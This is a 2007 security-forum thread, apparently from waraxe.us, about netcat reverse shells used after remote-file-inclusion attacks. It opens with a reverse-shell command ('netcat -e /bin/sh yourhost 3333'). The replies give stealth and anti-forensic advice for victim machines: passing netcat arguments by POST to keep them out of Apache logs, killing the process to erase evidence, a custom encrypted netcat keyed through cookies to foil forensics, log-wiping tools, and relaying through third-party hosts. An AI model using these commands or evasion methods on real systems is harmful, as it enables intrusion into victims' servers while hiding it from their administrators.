 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 63
 Members: 0
 Total: 63
|
|
|
|
|
|
Full disclosure |
|
CyberDanube Security Research 20251014-0 | Multiple Vulnerabilities in Phoenix Contact QUINT4 UPS
apis.google.com - Insecure redirect via __lu parameter(exploited in the wild)
Urgent Security Vulnerabilities Discovered in Mercku Routers Model M6a
Re: Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
[SBA-ADV-20250730-01] CVE-2025-39664: Checkmk Path Traversal
[SBA-ADV-20250724-01] CVE-2025-32919: Checkmk Agent Privilege Escalation via Insecure Temporary Files
CVE-2025-59397 - Open Web Analytics SQL Injection
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Re: Defense in depth -- the Microsoft way (part 93): SRP/SAFERwhitelisting goes black on Windows 11
Re: [FD]: "Glass Cage" – Zero-Click iMessage ? Persistent iOS Compromise + Bricking (CVE-2025-24085 / 24201, CNVD-2025-07885)
Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
Samtools v1.22.1 Uncontrolled Memory Allocation from Large BED Intervals Causes Denial-of-Service in Samtools/HTSlib
Samtools v1.22.1 Improper Handling of Excessive Histogram Bin Counts in Samtools Coverage Leads to Stack Overflow
|
|
|
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
reverse shell tradeoff |
|
 Posted: Tue Jun 05, 2007 7:28 pm |
 |
|
| drag |
| Active user |
 |
|
| Joined: May 31, 2007 |
| Posts: 25 |
|
|
|
 |
|
 |
|
I was doing some reading on old posts and noticed multiple threads that suggest using a reverse shell with netcat. Although this seems quite useful (using the php shell sucks in some ways compared to a real one, and to bypass logs), it seems to me that there is a tradeoff. Using the reverse shell opens by using:
netcat -e /bin/sh yourhost 3333
necessitates you placing your source address into a running process. I'd imagine that this is more noticeable than having it within the logs (depending on the admin). Am I missing something that would make this more stealthy? Any comments? |
|
|
|
|
|
|
|
|
| Posted: Fri Jun 08, 2007 1:29 pm |
|
|
| y3dips |
| Valuable expert |
 |
|
| Joined: Feb 25, 2005 |
| Posts: 281 |
| Location: Indonesia |
|
|
|
|
|
|
the idea is, by using a reverse shell u would able to execute a shell rather than put some shell backdoor on victim (because a rule at victims firewall), you know sometimes you need to execute some command on victim box.
I agree, your ip will be logged, but do you think your connection (accessing the web for some php remote file inclusion) arent log either ?
so, u need some "covering track" mechanism, old time ago there was a
remove.c" , i think u can find a toushand or u can made one,
or, u could find some machine in some "other place" to receive your "reverse shell" |
|
_________________
IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
|
Re: reverse shell tradeoff |
|
| Posted: Fri Jun 08, 2007 10:23 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| drag wrote: | I was doing some reading on old posts and noticed multiple threads that suggest using a reverse shell with netcat. Although this seems quite useful (using the php shell sucks in some ways compared to a real one, and to bypass logs), it seems to me that there is a tradeoff. Using the reverse shell opens by using:
netcat -e /bin/sh yourhost 3333
necessitates you placing your source address into a running process. I'd imagine that this is more noticeable than having it within the logs (depending on the admin). Am I missing something that would make this more stealthy? Any comments? |
First: if we want to "execute" netcat from php's exec() or system(), then by using POST method for delivering commandline arguments for netcat we can probably evade logging host and port to apache logs.
Second: after shell using netcat process must be killed. So no evidence stays.
Still I have vision for more paranoid uses:
Let's assume, that netcat is encrypted and wrapped to external file, which will receive encryption key from $_POST or $_COOKIE vector and then will unpack payload, containing netcat. And netcat itself is modified version, which has all needed information inside, so it does not need any command line parameters.
If somehow that encrypted file stays to hdd (if attacker for some reason forgets to delete traces), then it is practically impossible to decrypt it, because the key is unknown and can't be found from Apache logs.
Conclusion - best tools are manually modified and improved opensource tools  |
|
|
|
|
|
|
Re: reverse shell tradeoff |
|
| Posted: Sun Jun 10, 2007 2:52 am |
|
|
| y3dips |
| Valuable expert |
|
|
| Joined: Feb 25, 2005 |
| Posts: 281 |
| Location: Indonesia |
|
|
|
|
|
|
| waraxe wrote: |
First: if we want to "execute" netcat from php's exec() or system(), then by using POST method for delivering commandline arguments for netcat we can probably evade logging host and port to apache logs.
Second: after shell using netcat process must be killed. So no evidence stays.
Still I have vision for more paranoid uses:
Let's assume, that netcat is encrypted and wrapped to external file, which will receive encryption key from $_POST or $_COOKIE vector and then will unpack payload, containing netcat. And netcat itself is modified version, which has all needed information inside, so it does not need any command line parameters.
If somehow that encrypted file stays to hdd (if attacker for some reason forgets to delete traces), then it is practically impossible to decrypt it, because the key is unknown and can't be found from Apache logs.
Conclusion - best tools are manually modified and improved opensource tools |
CMIIW, So i think waraxe try to say "made your own tools for e.g your own netcat"  , its an unusual ways so its hard to trace (by IDS, IPS, rkhunter tools and other dig forensic tools because it wouldnt be in there database/pattern).
but as far as i know, being anonymous is not "always" without a log, i rather fake it or use another "character"
SOL |
|
_________________
IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
|
www.waraxe.us Forum Index -> Remote file inclusion
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
